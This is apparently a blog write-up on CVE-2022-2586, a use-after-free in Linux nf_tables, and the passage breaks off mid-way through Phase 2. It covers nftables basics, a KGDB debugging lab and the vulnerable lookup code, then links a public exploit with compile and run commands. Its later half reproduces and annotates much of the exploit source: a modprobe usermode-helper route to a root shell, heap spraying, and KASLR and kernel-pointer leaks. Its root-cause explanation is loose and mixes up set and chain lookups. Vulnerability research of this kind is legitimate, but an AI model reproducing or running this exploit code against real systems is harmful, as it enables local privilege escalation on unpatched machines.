Use-After-Free Vulnerability — Linked Chain between NFT Tables — CVE-2022–2586

34 min readApr 27, 2024

Screenshots from the blog posts

Summary

It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.

Description

It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.

What is NF_Tables?

NF_Tables is a packet-filtering framework in the Linux kernel that provides an efficient and flexible way to classify and manipulate network packets. It is designed to replace the older iptables and ip6tables tools for firewall and packet filtering tasks, offering improved performance, syntax, and capabilities.

NF_Tables allows you to define rulesets to control the flow of network packets through your system. It uses a rule-based syntax to match packets based on various criteria and then applies actions to those packets, such as dropping, accepting, or modifying them. The rules are organized into tables, chains, and rulesets, providing a hierarchical structure for packet filtering.

Here’s a simple example of using NF_Tables to create a rule that allows incoming SSH (TCP port 22) connections:

1. Installing nf_tables (if not already installed):

Make sure NF_Tables is installed on your system. You can typically install it using your distribution package manager.

2. Creating a nf_tables Rule:

Open a terminal and run the following commands as the root user (or using sudo):

# Create an nftables rule to allow incoming SSH connections
   nft add rule ip filter input tcp dport 22 accept
   
   # List the rules to verify
   nft list ruleset

Let’s break down the command:

- nft add rule: This is the command to add a rule to an nf_tables ruleset.

- ip: Specifies the IP protocol.

- filter: Refers to the filter table, which is commonly used for packet filtering.

- input: Refers to the input chain, which is used for incoming packets.

- tcp dport 22: This is the matching criteria. It matches TCP packets with destination port 22 (SSH).

- accept: This is the action to take if the packet matches the criteria. In this case, it allows the packet.

Testing the Rule: To test the rule, you can initiate an SSH connection to your system from another machine. If the rule is correctly configured, the connection should be allowed.

NF_Tables provides a wide range of features, including more complex rule structures, address translation, connection tracking, and more. The above example demonstrates how to create a basic rule to allow SSH connections, but NF_Tables can be used for much more advanced network packet filtering and manipulation tasks.

Expression and Registers

In nf_tables, expressions and registers are used to define actions and store data while processing network packets. Expressions are building blocks that allow you to perform various actions on packets, such as accepting, dropping, or modifying them. Registers are memory locations used to store packet data temporarily for further processing.

Imagine a security guard at the entrance of a building, and the job of a security guard, is to decide who can enter and what actions they’re allowed to take inside. To make these decisions, security guards need to look at certain information about the people entering. This information could be things like their name, ID card, purpose of visit, and more.

In the world of networks, similar decisions need to be made to allow or control network traffic. This is where expressions come in. Just like your need for information to make decisions, expressions in network filtering help us gather information from network traffic and perform actions based on that information.

Expressions are like pieces of logic that help us understand what’s happening in the network traffic and allow us to take action accordingly. They are the building blocks of rules in a network firewall or filter.

Think of expressions as mini-programs that analyze network data to answer questions like “Who is sending this data?” or “What type of data is being sent?” This information is crucial for making decisions about whether to allow or block traffic.

When someone creates a new type of expression, like logic with a specific function, it’s defined in a special place in the computer’s brain (kernel). This special place knows the name of the expression, what it can do, and how it should be used.

In the Linux kernel, when a new type of expression is created by a module (such as net/netfilter/nft_immediate.c), there is a special structure called nft_expr_type associated with it. This structure contains important information about the expression type, including its name, a table of functions (called ops functions) that define its behavior, various flags, and more.

Explanation with an Analogy:

Think of expression types as different types of tools you can use to build something. Each tool has its own set of characteristics and functions. The nft_expr_type structure is like a user manual for each tool. It tells you the tool's name, what functions it can perform, and any special features it has.

Example Analogy: Building Blocks with Different Tools

Imagine you have a box of building blocks, each representing a different type of expression. You want to build various structures using these blocks. Each block type has a user manual that explains how to use it.

Block Types: Imagine you have blocks of different shapes, like squares, triangles, and circles.
User Manuals: Each block type comes with a user manual that tells you its name, how to stack them, how to connect them, and any special features they have.
Building: You follow the instructions in the user manual to stack and connect the blocks in specific ways to create different structures.

                  +-----------------------+
                  |nft_expr_type Structure|
                  +-----------------------+
                  | Name: Immediate       |
                  | Ops Table:            |
                  | - Op1: Perform Action |
                  | - Op2: Handle Event   |
                  | Flags: Important      |
                  +-----------------------+

                         |
                         v

+------------------+   +------------------+   +------------------+
|    Expression    |   |    Expression    |   |    Expression    |
|   Type: Square   |   |  Type: Triangle  |   |    Type: Circle  |
|   Ops Table:     |   |  Ops Table:     |   |   Ops Table:     |
|   - Op1: Stack   |   |  - Op1: Connect |   |  - Op1: Roll     |
|   - Op2: Paint   |   |  - Op2: Color   |   |  - Op2: Bounce   |
|                  |   |                 |   |                  |
+------------------+   +------------------+   +------------------+

In this analogy:

. The nft_expr_type structure is like the user manual for each block type.
. Each block type corresponds to an expression type defined in the kernel.
. The ops table in the structure is like the set of instructions in the user manual.
.The building process corresponds to using the expression types to achieve specific actions or behaviors.

Just like you use different building blocks to create different structures, in the kernel, different expression types are used to achieve various functionalities within the networking and filtering systems. The nft_expr_type structure provides the necessary information for the kernel to understand and utilize these expression types effectively.

A More Practical Example:

An example of an expression is the “counter” expression, which is used to count the number of packets that match a specific rule. Let’s see how to use the “counter” expression to count incoming packets on a specific port.

Suppose you want to count the number of incoming packets on port 80 (HTTP) using nf_tables. First, you would create a new table to store the rule:

nft add table ip leak_chain

Then, you would add a new chain to the table:

nft add chain ip leak_chain input { type filter hook input priority 0 \; }

Next, you can define the rule with the “counter” expression:

nft add rule ip leak_chain input tcp dport 80 counter

Now, every time a packet with TCP destination port 80 arrives, nf_tables will increment the counter for that rule. To view the counters, you can use the following command:

nft list ruleset

You will see the counters associated with the rule:

table ip leak_chain {
    chain input {
        type filter hook input priority 0; policy accept;
        tcp dport 80 counter packets 1024 bytes 122880
    }
}
`

In this example, 1024 packets with a total of 122880 bytes have been counted so far.

Registers in nf_tables are used to store specific packet data that can be referenced in subsequent rules or actions. For example, you can use a register to store the source IP address of a packet and then use that information in a different rule.

Overall, expressions and registers in nf_tables provide powerful mechanisms for customizing packet processing and implementing advanced filtering and networking logic.

Two specific flag values are mentioned in the statement: stateful (NFT_EXPR_STATEFUL) and garbage collectible (NFT_EXPR_GC). These flags indicate specific characteristics or behaviors of the expression type.

                           +------------------+
                           | nft_expr_type    |
                           +------------------+
                           | select_ops       | --> Select appropriate ops
                           | release_ops      | --> Release ops resources
                           | ops              | --> Default ops
                           | list             | --> Internal list
                           | name             | --> Identifier
                           | owner            | --> Module reference
                           | policy           | --> Attribute policy
                           | maxattr          | --> Highest attribute number
                           | family           | --> Address family
                           | flags            | --> Expression type flags
                           +------------------+
                                     |
            +------------------------|------------------------+
            |                        |                        |
            |                  +------------+          +------------+
            |                  | NFT_EXPR_  |          | NFT_EXPR_  |
            |                  | STATEFUL   |          | GC         |
            |                  +------------+          +------------+
            |                        ^                        ^
            |                        |                        |
            +------------------------|------------------------+
                                     |
                              Specific Expression Flags

Of course, it’s very simplified information but I hope it sets up some information to get started with.

If you want to know more information about nf_tables and Expression, please follow below:

https://wiki.nftables.org/wiki-nftables/index.php/What_is_nftables%3F

https://www.vicarius.io/vsociety/posts/3001

Build the Lab

As this is a kernel module vulnerability it’s typical to debug, so you need to have a little bit more patience than usual 🦐

VirtualBox
I used 2 Linux Virtual Machines.

As we have to debug a Kernel Module and Kernel is a user-space process we GDB alone cannot use it for debugging hence we need an Client/Server architecture. Kernel programs can be debugged remotely using the combination of gdbserver the target machine and gdb on the host machine/development machine. The Linux kernel has a GDB Server implementation called KGDB. It communicates with a GDB client over a network or serial port connection.

Host/Development Machine: Runs gdb against the vmlinux file which contains the symbols and performs debugging
Target Machine: Runs kgdb and is the machine to be debugged

    ------------------                              --------------------
    |       Host      |                             |       Target     |
    |                 |                             |                  |
    |  -------------  |                             |   ------------   |
    | |     gdb     | |<--------------------------->|  |    kgdb    |  |
    | |             | |             Serial or       |  |            |  |
    | --------------  |             Ethernet        |  -------------   |
    |       |         |             Connection      |        |         |
    |  -------------- |                             |  --------------  |
    | | Kernel image ||                             |  |Linux Kernel | |
    | | with debug   ||                             |  |(zImage)     | |
    | | symbols      ||                             |  |             | |
    | | (vmlinux)    ||                             |  --------------- |
    | ----------------|                             |                  |
    -------------------                             --------------------
Hence Two machines are required for using kgdb:

KGDB is a GDB Server implementation integrated into the Linux Kernel, It supports serial port communication (available in the mainline kernel) and network communication (patch required)

It’s available in the mainline Linux kernel since version 2.6.26 (x86 and sparc) and 2.6.27 (arm, MIPS, and PPC)

Enables full control over kernel execution on target, including memory read and write, step-by-step execution, and even breakpoints in interrupt handlers

There might be other ways to do it but I generally do the above way.

3. I am using Ubuntu AMD64-22.04 LTS iso: https://releases.ubuntu.com/

Connect and Create a Serial Port in VirtualBox

The assumption for the step:

This has been assumed that users have ISO images downloaded locally and already created 2 VM's with that.

For the Demonstration I created 2 machines named as target-server and dev Machine.

To create a serial port in VirtualBox and Connect the machines it's very easy

Select your target machine from virtualbox and go to the settings options
Once you are in the settings tab of the target server select the Serial Ports and enter the below configuration,
Don’t check the Connect to existing pipe/socket as we don't have any previous ones.

4. Once we have the serial port configured follow the step 1 and 2 for dev machine as well, but in dev machine you need to check Connect to existing pipe/socket and make sure you specify the same Path/Address

Once that’s done Congratulations Labs are ready

WARNING

! Do not start the Dev machine first other wise you will see an error of serial port as you might have already noticed that we connected the 2 machines together with serial port

DEBUGGING KERNEL — nf_tables

As we discussed already the vulnerability lies in nf_tables and it's a kernel module so to debug a kernel module we need to follow some steps let's do those initial settings first:

Verify the machines (dev & target) are communicating in serial-port , to verify the communication between the dev and target machine, send the message on serial ports

I did send the message from target machine to dev machine and confirmed that they are communicating with each other on the serial port. The current version of the kernel is 22.04 if you have downloaded it from the ubuntu official website it will not be an older version so we have to downgrade the kernel , let's continue to do that step in Debugging stage.

2. Download the affected versions of kernel , so to accomplish this step I downloaded the v5.12 from the official kernel GitHub

Once you have checked the affected version of the kernel you need to install this image and update it to your grub but before we do that we need some libraries to be available

1. build-essentials
2. flex
3. bison
4. libnftnl-dev
5. libmnl-dev
6. nftables - (Installed by default but just in case missing)
7. libncurses-dev
8. dkms
9. libssl-dev
10. libelf-dev

Once the packages are installed let’s enable KGDB in the config file to debug the kernel and enable KGDB settings please move inside the git repo where we have downloaded the kernel source and run make nconfig command

This command will bring the config file in graphical view and verify the KGDB the variable value is enabled.

3. Select the Generic Kernel Debugging Instruments

4. Verify the KGDB and magic sysrq option is selected

5. Once these settings are verified we need to verify one more variable DEBUG_INFO it should be y as well, as to look for the variable press f8 and search for the value

As from the verification process, all things are verified, libraries have been installed and things are in place, as the flaw is in nf_tables we need to make sure that this module is also enabled and installed so let's verify that too

To do that we will go to the Networking Support > Networking Option > Network Packet Filtering Framework > Core Netfilter Configuration

For the safer side (as it takes a lot of time to install modules or install kernel image) and we should not miss any class or file debugging I have enabled all netfilter modules for nf_tables so that we don't have to repeat this step for any miss.

Press f6 and save the changes and run make -j8 the command to build the Linux kernel with multiple threads in parallel.

Go out and Grab a coffee as it going to take a long believe me very long

Verify for vmlinux file in the location.

After make -j8 success you need to run make modules_install command and wait for installation and completion of the command.

Once that’s completed run make install and this will update the v5.12 modules in boot , once that's done write update-grub and reboot command to restart the machine. During the restart of the machine, it will display the option to select the kernel version, select v5.12 and boot the kernel.

Verify the kernel version by writing uname -r

Now we have downgraded to the affected version of kernel

Next, We wanted to enable the GDB-Script in the affected target machine, GDB Scripts is a collection of helper scripts that can simplify kernel debugging steps

Todo that we have to perform 2 steps target machine we have to enable CONFIG_GDB_SCRIPT which was enabled in our target machine already.

In Dev machine we have to create a ~/.gdbinit machine and write add-auto-load-safe-path <location-bin-file>

To start the debugging on target machine we also have to copy the debugged build and compiled kernel Linux folder to the dev server. To make copying easy I installed open ssh in target server and used scp command in dev server to copy linux compiled folder from target machine to dev

In target machine we made a tar.gz file and In dev the server used the SCP command to copy linux.tar.gz from target to dev

make tar.gz file with tar : tar -czvf linux.tar.gz linux

In dev server I copied the folder at /home/target/Desktop/linux

scp <username>@<ip-address>:<file-to-copy> <dev-server-location-to-paste>

And then extracted the gz file in the dev server by using the tar command : tar -xzvf linux.tar.gz

Open the copied vmlinux with gdb , make sure to open it with the root user in dev machine

Next to debug kernel we have to specify the serial port and baud rate to the kgdboc so that we can debug kernel from the dev machine.

Run the sysrq magic sequence in target server

echo g > /proc/sysrq-trigger

and On the dev server run target remote /dev/ttyS0

We can see the kgdb breakpoints triggered let's put the breakpoint in our suspected functions

As we have enabled GDB-Script let's load our beloved affected nf_tables.ko module, and to do that we use apropos lx so write lx-symbols to load nf_tables.ko and other existing modules from kernel to GDB

Once the module is loaded we can put the breakpoint in suspected function our case (nft_set_elem_init) under nf_tables_api.c and start our static analysis

STATIC ANALYSIS

In nft tables expression could reference an nft set on a different nft table and to check how it does I started analyses in nf_tables_api where there is a struct called nf_tables_set_lookup_byid which does this implementation:

Breakdown of the Code:

Function Signature:

The function nft_chain_lookup_byid takes two parameters: a pointer to the network namespace (const struct net *net) and a pointer to a Netlink attribute (const struct nlattr *nla).

2. Extracting Chain ID:

The function extracts the ID of the nft chain from the Netlink attribute (nla) using ntohl(nla_get_be32(nla)). This assumes that the ID is a 32-bit integer stored in big-endian format.

3 . Transaction List Iteration:

It iterates through the list of transactions (struct nft_trans) in the commit list of the specified network namespace (net->nft.commit_list).

4. Transaction Check:

For each transaction, it checks if the transaction corresponds to a new chain (trans->msg_type == NFT_MSG_NEWCHAIN) and if the ID of that chain matches the specified ID (id == nft_trans_chain_id(trans)).

5. Returning the Chain:

If a match is found, it returns a pointer to the corresponding nft chain (return chain).

6. Error Handling:

If no match is found, it returns an error code (ERR_PTR(-ENOENT)) to indicate that the chain with the specified ID does not exist.

Now nft_chain_lookup_byid is referenced in 2 places :

Let’s analyze the nft_chain_lookup_byid struct:

static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
					       const struct nlattr *nla)
{
	u32 id = ntohl(nla_get_be32(nla));
	struct nft_trans *trans;

	list_for_each_entry(trans, &net->nft.commit_list, list) {
		struct nft_chain *chain = trans->ctx.chain;

		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
		    id == nft_trans_chain_id(trans))
			return chain;
	}
	return ERR_PTR(-ENOENT);
}

nf_tables_newrule method code breakdown for :

Table Lookup:

The function starts by looking up the target nft_table based on the attributes provided in the Netlink message. If the table lookup fails, it returns an error.
Chain Lookup:
If the Netlink attribute NFTA_RULE_CHAIN is present, it looks up the corresponding nft_chain within the specified table. If NFTA_RULE_CHAIN_ID is present, it looks up the chain by ID. If neither is present, it returns an error.
Handle Lookup:
If NFTA_RULE_HANDLE is present, it looks up the rule by the provided handle within the specified chain. If NLM_F_EXCL is set, it checks for exclusivity. If NLM_F_REPLACE is set, it marks the existing rule for replacement.
Handle Allocation:
If NFTA_RULE_HANDLE is not present, it allocates a new handle for the rule using nf_tables_alloc_handle.
Positioning Logic:
If positioning information is present (NFTA_RULE_POSITION or NFTA_RULE_POSITION_ID), it looks up the rule at the specified position for potential insertion.
Further Logic:
The code includes additional logic related to rule creation, replacement, and position within the chain.
Cleanup and Return:
The code concludes with cleanup and return statements based on the outcomes of the operations.

nft_verdict_init method code breakdown for :

Attribute Parsing:

The function starts by parsing the nested attributes within the Netlink attribute (nla) using nla_parse_nested_deprecated.

2. Verdict Code Extraction:

It extracts the verdict code from the parsed attributes.

3. Switch Statement:

The function uses a switch statement to handle different cases based on the extracted verdict code.

4. Jump and Goto Handling:

For verdict codes NFT_JUMP and NFT_GOTO, the function checks if either the NFTA_VERDICT_CHAIN or NFTA_VERDICT_CHAIN_ID the attribute is present.

5. Chain Lookup:

If the chain name (NFTA_VERDICT_CHAIN) is present, it looks up the chain using nft_chain_lookup. If the chain ID (NFTA_VERDICT_CHAIN_ID) is present, it looks up the chain by ID using nft_chain_lookup_byid.

6. Handling Chain Lookup Results:

The function handles the result of the chain lookup, checks if it’s a base chain, increments the chain’s usage count, and sets the chain in the nft_data structure.

7. Data Descriptor Setting:

Finally, the function sets the data descriptor with the length and type information.

Scenarios when nft_chain_lookup_byid is called:

When the verdict code is NFT_JUMP or NFT_GOTO.
When the NFTA_VERDICT_CHAIN_ID the attribute is present in the Netlink message, indicating that the rule involves jumping or going to another chain identified by its ID.

Consider a scenario where a user is configuring a network filtering rule that involves jumping to another chain based on the chain’s ID. The nft_chain_lookup_byid function is called to find the target chain by its ID within the network namespace.

Netlink Message:
- Attribute NFTA_VERDICT_CODE: NFT_JUMP
- Attribute NFTA_VERDICT_CHAIN_ID: <ID of the target chain>

Function Flow:
1. The function extracts the verdict code (NFT_JUMP) and the chain ID.
2. It calls nft_chain_lookup_byid to find the target chain by its ID.
3. If the lookup is successful, it increments the chain's usage count and sets it in the nft_data structure.
4. The function returns successfully, indicating that the verdict and associated chain have been initialized.

Root Cause

Going back to the root cause analysis of the code :

static struct nft_chain nft_chain_lookup_byid(const struct net net,
					       const struct nlattr *nla)
{
    u32 id = ntohl(nla_get_be32(nla));
    struct nft_trans *trans;
    list_for_each_entry(trans, &net->nft.commit_list, list) {
        struct nft_chain *chain = trans->ctx.chain;
        if (trans->msg_type == NFT_MSG_NEWCHAIN &&
            id == nft_trans_chain_id(trans))
            return chain;
    }
    return ERR_PTR(-ENOENT);
}

A use-after-free vulnerability could potentially occur in a scenario where a chain is deleted or freed after being part of a transaction but before the nft_chain_lookup_byid function is called. If a transaction involves the creation of a new chain (NFT_MSG_NEWCHAIN) and this chain is later deleted or freed, accessing the chain pointer after deletion would result in a use-after-free vulnerability.

Consider the following sequence of events:

A new chain with a specific ID is created as part of a transaction.
The transaction is added to the commit list.
Another part of the system deletes or frees the chain.
Later, the nft_chain_lookup_byid function is called to look up the chain by its ID.
The function returns a pointer to the now-deleted or freed chain, leading to a use-after-free vulnerability when the pointer is subsequently dereferenced.

+---------------------+      +---------------------+      +---------------------+
|  Transaction List   |      |      nft_chain      |      |      nft_chain      |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (New)      | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (Delete)   | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    +--------------+ |      |    +------------+   |      |    +------------+   |
|    | Transaction  | | ---> |    | Chain ID   |   |      |    |   Freed    |   |
|    |   (Modify)   | |      |    |            |   |      |    | or Deleted |   |
|    +--------------+ |      +---------------------+      +---------------------+
|          ...        |
+---------------------+

So the transaction list contains various transactions, including new chains and potential chain deletions. If a chain is deleted or freed after being part of a transaction, accessing it later through the nft_chain_lookup_byid function could lead to a use-after-free vulnerability.

Exploitation and Explanation:

We have an exploits available for the vulnerability / POC:

@lockedbyte : https://github.com/sniper404ghostxploit/CVE-2022-2586

I used the exploit.

The requirement to run the exploit:

You need libmnl-dev and libnftnl-dev packages installed in your machine.

Affected Version

Linux, introduced with the commit 958bee14d071 (https://github.com/torvalds/linux/commit/958bee14d071).

Ubuntu <= 22.04 before security patch

Test Environment

Platform

Ubuntu 22.04 amd64

Versions

Linux ubuntu 5.12.0 #2 SMP Aug 18 14:17:41 JST 2023 x86_64 x86_64 x86_64 GNU/Linux

Once the Exploit is downloaded we need to run it.

Running Exploit

# Once the exploit is downloaded go to the downloaded folder and run below command   

gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread #

Result

use git tool to download the exploit from: https://github.com/sniper404ghostxploit/CVE-2022-2586
Compile the exploit with the gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread command to create the exploit executable and run ./exploit

Exploitation — Strategy Explanation and Development

The exploit developed by the author is divided into several phases, and every phase is explained by the author in the form of comments inside the code which was helpful to know the intentions of how the exploit was developed let’s take an example for some of such lines and comments like below piece of code from an exploit if we see:

int main(int argc, char *argv[]) {
	struct mnl_socket *s = NULL;
	struct mnl_nlmsg_batch *batch = NULL;
	struct nlmsghdr *nh = NULL;
	int r = 0, seq = 0;
	uint16_t klen[64] = { 1 };
	char buf[16384] = { 0 };
	char *klk_obj_name = NULL;
	char *hlk_obj_name = NULL;
	char *sp_d = NULL;
	uint64_t *sp_d_l = NULL;
	char *sp2_d = NULL;
	uint64_t *sp2_d_l = NULL;
	char *rop_d = NULL;
	uint64_t *rop_d_l = NULL;
	size_t klk_tries = 0;
	pthread_t tx;
	void *retval = NULL;
	int pid = 0;
	int fd = 0;
	int pipefd[2] = { 0 };
	int sfd = 0, cfd = 0;
	int is_success = 0;
	char *pipefd_str = NULL;
	
	if(geteuid() == 0)
		goto EXP_P;
		
	pipe(pipefd);
	
	/* 
	   Drop callback scripts to achieve LPE from modprobe usermode
	   helper execution
	*/
	drop_callback_scripts();
	
	/*
	   Launch the process that will pop the root shell: it needs
	   to be outside of the namespace
	*/
	pid = fork();
	if(pid == 0) {
		close(pipefd[1]);

		r = read(pipefd[0], &is_success, sizeof(int));
		if(r < 0)
			bye("[-] Exploit failed!");
		
		sleep(2);
		
		if(is_success)
			launch_trigger();
		exit(0);
	}
	
	close(pipefd[0]);
	
	asprintf(&pipefd_str, "%d", pipefd[1]);
	
	//unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

	/*
	   Execute ourselves in a new network namespace to
	   be able to trigger and exploit the bug
	*/
	char *args[] = {
		UNSHARE_PATH, "-Urnm", argv[0], pipefd_str,
		NULL,
	};
	execvp(UNSHARE_PATH, args);
}

Let’s break down the comments and explain the developer’s intentions:

Drop callback scripts to achieve LPE from modprobe usermode helper execution:

The term “LPE” stands for Local Privilege Escalation. The goal here is to escalate the privileges of the current process to root (superuser).
“modprobe” is a Linux utility to add or remove modules from the Linux kernel. The “usermode helper execution” refers to executing code in the kernel from user space, typically through interactions with modprobe.
The mention of “callback scripts” suggests that the developer is introducing or manipulating scripts that will be executed by modprobe as part of a usermode helper mechanism. This manipulation is likely intended to exploit a vulnerability in the way modprobe handles these scripts, leading to privilege escalation.

2. Launch the process that will pop the root shell: it needs to be outside of the namespace:

The developer is creating a new process using fork() to run a specific function (launch_trigger()) that is designed to pop a root shell (provide a root command prompt).
The comment emphasizes that this process needs to be outside of a namespace. Namespaces in Linux provide isolated environments for processes. Running outside the namespace may be necessary for the exploit to have the desired effect on the target system.

3. Execute ourselves in a new network namespace to be able to trigger and exploit the bug:

The code uses execvp() to replace the current process image with a new one. This new process will run in a new network namespace (UNSHARE_PATH is a path to an executable that likely sets up namespaces).
The creation of a new network namespace is mentioned because vulnerability being exploited related to network operations. By executing in a new network namespace, the exploit may be more effective or able to trigger specific conditions required for the attack.

Continue the exploitation code :

EXP_P:
	if(argc != 2)
		bye("[-] pipe fd not provided for namespace process");
	
	// Obtain the pipe file descriptor from the command line argument
	pipefd[1] = atoi(argv[1]);

	// Assign the process to a specific CPU core for heap shaping reliability
	assign_to_core(DEF_CORE);	// Seed the random number generator
	srand(time(NULL));
	
	// Print a message indicating the start of the exploitation process
	puts("[*] Saving current state...");
	
	// Save the current state, possibly referring to capturing the state of the system or process
	save_state();	/* ===================== [  Pre-cleanup ] ===================== */	// Remove exploit tables left from other executions
	delete_table(TABLE_KLK_UAF_A);
	delete_table(TABLE_KLK_UAF_B);
	delete_table(TABLE_HLK_UAF_A);
	delete_table(TABLE_HLK_UAF_B);
	delete_table(TABLE_OBJ_SPRAY_A);
	delete_table(TABLE_RD_UAF_A);
	delete_table(TABLE_RD_UAF_B);
	delete_table(TABLE_RP_UAF_A);
	delete_table(TABLE_RP_UAF_B);	/* ===================== [ Pre-Alloc ] ===================== */	/*
		As a result of the table spraying, adding the traversing to add
		the hooking rule will turn slow, we create the objects for the
		last stage at the very beginning of the exploit.
	*/
	
	// Create objects for the last stage of the exploit
	create_uaf(TABLE_RP_UAF_A, TABLE_RP_UAF_B, OBJ_RP_UAF, SET_RP_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 1);
	
	// Set up hook for the last stage
	set_up_hook(TABLE_RP_UAF_B, SET_RP_UAF, CHAIN_RP_UAF);	/* ===================== [ Phase 1 - KASLR Leak ] ===================== */	// Print a message indicating the start of Phase 1 - KASLR Leak
	puts("[i] Phase 1 - KASLR leak");

So the next phase of the exploitation code mentioned above prepares the environment for an exploitation process, cleans up any remnants of previous executions, performs pre-allocation steps, and initiates the first phase of the exploit, which involves leaking the Kernel Address Space Layout Randomization (KASLR)

From here onwards the exploitation code is divided in 5 phases

Phase 1: The developer is attempting to achieve a Kernel Address Space Layout Randomization (KASLR) leak during Phase 1 of the exploitation process.

/* ===================== [ Phase 1 - KASLR Leak ] ===================== */
puts("[i] Phase 1 - KASLR leak");

PHASE_1:
	puts("\t[*] Triggering UAF on nft_object struct...");
	// Create an nft_object with a user-controlled name for Use-After-Free (UAF) exploitation
	klk_obj_name = str_repeat('X', 0x20 - 2);
	create_uaf(TABLE_KLK_UAF_A, TABLE_KLK_UAF_B, klk_obj_name, SET_KLK_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 0);
	
	// Start a thread to spray seq_operations structs
	pthread_create(&tx, NULL, (void *)spray_seq_op_loop, NULL);
	
	// Delete the table holding the referenced object to start seq_operations spraying
	delete_table(TABLE_KLK_UAF_A);
	puts("\t[*] Spraying with seq_operations structs...");

	// Wait for the thread to finish seq_operations spraying
	pthread_join(tx, &retval);
	
	// Parse the leaked address of the single_open() function
	so_leaked_addr = parse_uaf_obj_name_leak(TABLE_KLK_UAF_B, SET_KLK_UAF, 0x40 + 12, 0);
	if(so_leaked_addr == 0 || (so_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
		// Cleanup and exit if the single_open() leak failed
		delete_table(TABLE_KLK_UAF_B);
		bye("[-] single_open() leak failed!");
	}
	
	puts("\t[*] Cleaning up descriptors...");
	
	// Cleanup descriptors used in the seq_operations spraying
	for(int i = 0 ; i < MAX_FDS ; i++)
		close(fds[i]);
	
	// Print the leaked addresses, including KASLR base
	printf("\t[+] Leaked: single_open() @ 0x%lx\n", so_leaked_addr);
	
	// Calculate KASLR base address
	kaslr_base = so_leaked_addr - SINGLE_OPEN_OFF;
	
	// Print the leaked KASLR base address
	printf("\t[+] Leaked: KASLR base @ 0x%lx\n", kaslr_base);

	// Recalculate offsets for every address needed based on the new KASLR base
	recalculate_from_kaslr_base();
	
	// Print other leaked addresses
	printf("\t[+] Leaked: prepare_kernel_cred() @ 0x%lx\n", prepare_kernel_cred);
	printf("\t[+] Leaked: commit_creds() @ 0x%lx\n", commit_creds);
	
	// Cleanup (from phase 1)
	puts("\t[*] Cleaning up...");
	delete_table(TABLE_KLK_UAF_B);

UAF Triggering: The code starts by triggering a Use-After-Free (UAF) vulnerability on an nft_object struct by creating an object with a user-controlled name.
Seq_operations Spraying: A thread is created to spray the heap with seq_operations structs, which are likely structures used for handling sequences of operations.
Cleanup and Seq_operations Leaking: The table holding the referenced object is deleted to initiate the spraying, and once completed, the leaked address of the single_open() function is parsed from the sprayed data.
Address Validation and Cleanup: The leaked address is validated, and if successful, the descriptors used in the seq_operations spraying are cleaned up.
KASLR Base Calculation: The KASLR base address is calculated by subtracting the offset of single_open() from its leaked address.
Recalculation and Printing: Offsets for other addresses are recalculated based on the new KASLR base, and various leaked addresses, including prepare_kernel_cred() and commit_creds(), are printed.
Cleanup: The cleanup involves deleting the table used for UAF exploitation in Phase 1.

Phase 1: of the exploit aims to leak the KASLR base address and adjust other offsets accordingly, providing the necessary information for subsequent stages of the exploitation process.

Phase 2: The developer is attempting to perform a Use-After-Free (UAF) vulnerability exploitation in the second phase, referred to as “Phase 2 — ctx->table leak.” The goal is to manipulate the allocation of nft_object structures in memory to leak information about the ctx->table and ctx->table->objects addresses

puts("[i] Phase 2 - ctx->table leak");

PHASE_2:

/*
   Our objective now is making nft_objects be allocated where our obj->key.name
   string was, right as we did for the KASLR leak phase.
   
   To do so, we need to provide a string of 0xc8 - 1 bytes for the object name.
   If we succeed, we will leak the first entry of one of the sprayed objects,
   which is obj->list.next, and this one points to &ctx->table->objects
*/

puts("\t[*] Triggering UAF on nft_object struct...");

// Allocate a string of 0xc8 - 1 bytes for the object name
hlk_obj_name = str_repeat('E', 0xc8 - 1);

// Create a UAF condition by freeing a specific table and then creating a new object in its place
create_uaf(TABLE_HLK_UAF_A, TABLE_HLK_UAF_B, hlk_obj_name, SET_HLK_UAF, OBJECT_TYPE_LIMIT, 1, TABLE_OBJ_SPRAY_A, 0);
delete_table(TABLE_HLK_UAF_A);

puts("\t[*] Spraying with nft_object structs...");

// Spray nft_object structures and trigger the UAF to allocate nft_objects where hlk_obj_name was
tbl_leaked_addr = spray_nft_object(TABLE_OBJ_SPRAY_A, 129, TABLE_HLK_UAF_B, SET_HLK_UAF);

// Check if the spray was successful and the leaked address is in the expected range
if(tbl_leaked_addr == 0 || (tbl_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
    delete_table(TABLE_HLK_UAF_B);
    delete_table(TABLE_OBJ_SPRAY_A);
    bye("[-] ctx->table leak failed!");
}

// Calculate the leaked address of ctx->table->objects
tbl_leaked_addr = tbl_leaked_addr - OFF_TO_OBJ_LST;

// Print the leaked addresses
printf("\t[+] Leaked: ctx->table (\"table3\") @ 0x%lx\n", tbl_leaked_addr);
printf("\t[+] Leaked: &ctx->table->objects (\"table3\") @ 0x%lx\n", tbl_leaked_addr + OFF_TO_OBJ_LST);

Objective: The objective is to manipulate the allocation of nft_object structures so that they are allocated in the same memory location where hlk_obj_name (the object name) was previously allocated. This allows the exploitation of a UAF vulnerability.
UAF Triggering: The code triggers the UAF condition by creating an object with a specific name (hlk_obj_name) and then freeing the associated table (TABLE_HLK_UAF_A). This sets the stage for the subsequent spray.
Spraying nft_object: The code sprays the memory with nft_object structures, and due to the UAF condition, these structures end up being allocated in the freed memory location. The goal is to manipulate the memory layout.
Validation: It checks whether the spraying was successful and the leaked address is in the expected range. If not, the exploitation process is terminated.
Leaked Addresses: If successful, it calculates the leaked address ctx->table->objects by adjusting the sprayed address. Finally, it prints the leaked addresses for further analysis.

Before UAF Triggering:
+--------------------------+
| hlk_obj_name (freed)     |
+--------------------------+
| ...                      |
